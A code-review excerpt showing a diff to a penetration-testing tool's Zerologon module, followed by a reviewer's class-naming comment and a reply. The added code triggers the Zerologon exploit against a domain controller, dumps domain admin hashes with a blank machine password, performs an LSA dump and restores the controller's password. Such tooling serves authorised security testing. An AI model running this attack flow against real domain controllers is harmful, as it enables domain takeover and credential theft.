cme/modules/zerologon.py

```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
                     zerologon=True,
                 )
             except Exception as e:
-                self.context.log.debug(f"Error updating zerologon status in database")
+                self.logger.debug(f"Error updating zerologon status in database")
 
-    def perform_attack(self, dc_handle, dc_ip, target_computer):
-        # Keep authenticating until successful. Expected average number of attempts needed: 256.
-        self.context.log.debug("Performing authentication attempts...")
-        rpc_con = None
-        try:
-            binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
-            rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
-            rpc_con.connect()
-            rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
+        if self.__pwn == True and self.__vuln == True:
+            username = None
+
+            zerologon_exp.perform_attack(pwn_flag=True)
+
+            secretsdump = secretsdump_nano(self.logger, connection)
+            try:
+                username, nthash = secretsdump.NTDSDump_BlankPass()
+            except Exception as e:
+                if not username:
+                    self.logger.fail('All domain admins account has smb login issues, add "--debug" to get more details.')
+                else:
+                    self.logger.fail(str(e))
+                return
+            else:
+                hexpass = secretsdump.LSADump(username=username, nthash=nthash)
+
+                action = ChangeMachinePassword(password=unhexlify(hexpass.strip("\r\n")), connection=connection, logger=self.logger)
+                action.restore_DCPass()
+
+class ZerologonEXP():
```

Comment:
Class naming should be camelcase, so in this instance it should be "ZeroLogonExp"

Reply:
Fixed!